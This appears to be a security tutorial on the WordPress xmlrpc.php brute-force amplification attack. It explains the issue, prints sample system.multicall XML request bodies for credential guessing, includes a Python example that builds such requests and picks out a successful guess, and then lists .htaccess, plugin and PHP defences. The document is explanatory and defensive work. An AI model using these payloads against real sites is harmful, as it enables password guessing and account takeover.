Brute Force Amplification Attacks/XML-RPC Pingback Vulnerability against WP xmlrpc
A new type of attack against WordPress has been reported, called the Brute Force Amplification Attack or the XML-RPC Pingback Vulnerability. It targets the 'xmlrpc.php' file that ships with every WordPress install.
Brute force attacks are common against any service exposed on the internet, such as SSH or FTP logins. This WordPress variant lets an attacker try hundreds of username/password combinations in a single HTTP request, and it does so through xmlrpc.php rather than wp-login.php, which most sites already rate-limit or protect with an .htaccess file.
Before going into the details of this attack first you should know about the xmlrpc file.
What is XML-RPC file?
XML-RPC is simply a way to make remote procedure calls over HTTP. In more detail, it is a set of implementations that let software running on different operating systems and in different environments call procedures over the internet via HTTP, using XML as the encoding. The format is simple to implement and still allows complex data structures to be sent and returned.
In WordPress it is commonly used by APIs and automated clients (remote publishing tools, mobile apps, pingbacks) to call functions on the site.
The attackers take advantage of the system.multicall method, which lets a client bundle many calls into one request, to test hundreds of passwords against xmlrpc.php in a single HTTP request.
A single guess, POSTed to /xmlrpc.php, looks like this (the server answers with an XML response saying whether the username/password combination was accepted):
<?xml version="1.0"?>
<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param><value><string>admin</string></value></param>
    <param><value><string>admin123</string></value></param>
  </params>
</methodCall>
Here the attacker tried the admin/admin123 username/password combination. Most attacks seen in the wild use the wp.getCategories method, which also requires a username/password, i.e. authentication, so its response reveals whether the guess was right.
Many other methods require authentication as well, for example wp.getUsersBlogs, wp.newPost, wp.editPost and wp.deletePost. Any of them can be used as the password oracle.
With system.multicall the attacker wraps one struct per guess into a single request. Each struct names the method to call and its parameters, so the example below carries two guesses (admin/password1 and admin/password2) in one HTTP call, and a real attack carries hundreds:
<?xml version="1.0"?>
<methodCall>
  <methodName>system.multicall</methodName>
  <params>
    <param><value><array><data>
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
          <value><string>admin</string></value>
          <value><string>password1</string></value>
        </data></array></value></member>
      </struct></value>
      <value><struct>
        <member><name>methodName</name><value><string>wp.getUsersBlogs</string></value></member>
        <member><name>params</name><value><array><data>
          <value><string>admin</string></value>
          <value><string>password2</string></value>
        </data></array></value></member>
      </struct></value>
    </data></array></value></param>
  </params>
</methodCall>
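To make the mechanics concrete, here is an added Python example (not code from the original post) that builds the system.multicall body described above with the standard library's xmlrpc.client, counts how many credential checks a request body carries (the number a defender would alert on), and picks the successful guess out of a multicall response. The response body is constructed here for illustration: failed sub-calls are shown as fault structs with code 403 and successful ones as an ordinary result list; the exact faultString and blog fields are assumptions, not copied from WordPress.

```python
import xmlrpc.client

# WordPress XML-RPC methods that require a username/password (the ones named in the text).
AUTHENTICATED_METHODS = {
    "wp.getUsersBlogs", "wp.getCategories",
    "wp.newPost", "wp.editPost", "wp.deletePost",
}


def single_call(username, password, method="wp.getUsersBlogs"):
    """One ordinary guess: a methodCall carrying username and password."""
    return xmlrpc.client.dumps((username, password), methodname=method)


def build_multicall(username, passwords, method="wp.getUsersBlogs"):
    """The amplified request: one sub-call struct per candidate password,
    all wrapped in a single system.multicall methodCall."""
    calls = [{"methodName": method, "params": [username, pw]} for pw in passwords]
    return xmlrpc.client.dumps((calls,), methodname="system.multicall")


def count_login_attempts(body):
    """How many credential checks does this request body perform?
    A plain authenticated call counts as 1; a multicall counts every
    authenticated sub-call, which is exactly the amplification factor."""
    params, methodname = xmlrpc.client.loads(body)
    if methodname == "system.multicall":
        return sum(1 for call in params[0]
                   if call.get("methodName") in AUTHENTICATED_METHODS)
    return 1 if methodname in AUTHENTICATED_METHODS else 0


def successful_indexes(response_body):
    """Return the positions of sub-calls that did not come back as a fault.
    In a multicall response each failed sub-call is a struct with
    faultCode/faultString; a successful one is the method's normal result."""
    (results,), _ = xmlrpc.client.loads(response_body)
    return [i for i, r in enumerate(results)
            if not (isinstance(r, dict) and "faultCode" in r)]


# Constructed sample response for three guesses: only the third one succeeded.
# (Fault message and blog fields are assumed for the example.)
SAMPLE_RESPONSE = xmlrpc.client.dumps(
    ([
        {"faultCode": 403, "faultString": "Incorrect username or password."},
        {"faultCode": 403, "faultString": "Incorrect username or password."},
        [{"blogid": "1", "blogName": "example", "isAdmin": True}],
    ],),
    methodresponse=True,
)


if __name__ == "__main__":
    guesses = ["admin123", "password", "letmein"]
    body = build_multicall("admin", guesses)
    print("sub-calls in one request:", count_login_attempts(body))
    hit = successful_indexes(SAMPLE_RESPONSE)
    print("guess that worked:", [guesses[i] for i in hit])
```

A request filter or WAF rule that applies count_login_attempts to POST bodies for xmlrpc.php and drops anything above 1 (or a small allowance for legitimate multicall clients) blocks the amplification without touching ordinary XML-RPC use.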
Protection Methods.
1. Using the .htaccess file.
a. Protect xmlrpc.php using RedirectMatch.
# protect xmlrpc
RedirectMatch 403 (?i)/xmlrpc.php
This rule returns 403 for any request whose path contains /xmlrpc.php (case-insensitive), so it works regardless of which directory WordPress is installed in, and it does no harm on a server where WordPress is not installed at all.
b. Protect using Order/Deny.
# protect xmlrpc
<Files xmlrpc.php>
Order Deny,Allow
Deny from all
</Files>
This is an easy way to protect xmlrpc.php. The <Files> wrapper limits the rule to that one file; without it "Deny from all" would block the whole directory. You can extend this block to allow access from specific IP addresses (an "Allow from" line after "Deny from all") for clients that genuinely need XML-RPC, or add an ErrorDocument to send blocked requests to a specific page. Note that Order/Deny/Allow is Apache 2.2 syntax (mod_access_compat on 2.4); on Apache 2.4 the native equivalent is "Require all denied".
2. Protection through plugins.
Search the plugin directory for an "xmlrpc" plugin that disables xmlrpc.php, install it and activate it. Check what the plugin actually does: some disable all of XML-RPC, others only remove system.multicall.
3. Protect using functions.
You can also protect xmlrpc.php with a few lines of PHP added directly to your theme's functions.php file. The filter below removes 'system.multicall' from the methods the XML-RPC server exposes, without a plugin and without touching the .htaccess file.
function shapeSpace_disable_xmlrpc_multicall($methods) {
	// drop system.multicall from the list of XML-RPC methods the server advertises and accepts
	unset($methods['system.multicall']);
	return $methods;
}
add_filter('xmlrpc_methods', 'shapeSpace_disable_xmlrpc_multicall');
The disadvantages of this method are that it is:
1. theme specific: functions.php belongs to the currently active theme, so the protection disappears as soon as you switch themes (placing the same code in a must-use plugin under wp-content/mu-plugins avoids this).
2. threat specific: the function disables only the system.multicall part of xmlrpc.php. It protects against the Brute Force Amplification Attack specifically, not against the other attacks that target xmlrpc.php, and an attacker can still brute force one password per request. This is another reason the .htaccess technique is the better choice: it blocks all types of XML-RPC attacks.
To wrap up, the .htaccess method is the most robust and most commonly chosen way to protect xmlrpc.php. Before blocking it, confirm that nothing you rely on needs XML-RPC (Jetpack, the WordPress mobile apps and pingbacks/trackbacks all use it), and whitelist those clients' IP addresses if they do.